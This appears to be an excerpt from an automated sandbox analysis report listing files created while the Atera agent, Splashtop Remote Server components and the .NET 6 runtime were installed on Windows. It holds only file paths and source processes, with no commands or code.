                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\64bits\stgamepad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxywddm.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\stdpms.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\32bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\32bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\64bits\stvad.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stmirror.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\64bits\stvspk.sysJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdwmark.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppBS.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libmp4v2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppED.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperExx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxywddm.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF3E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\PrnPort.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdbook.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9FF2.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\qrcodelib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsb.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libssl-3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x64\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\XDColMan.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12F6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SROpus.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264Wrapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Intrinsics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\32bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\swresample-2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRApp.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\hidkmdf.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVideoCtrlEx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\setupdrv.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\driver\mv2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\hidkmdf.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK_x86.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\64bits\stvspk.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\32bits\stvad.sysJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_is182.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_is9FE6.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\System32\SRCEF21.tmpJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\Temp\unpack\PreVerCheck.exeJump to dropped file
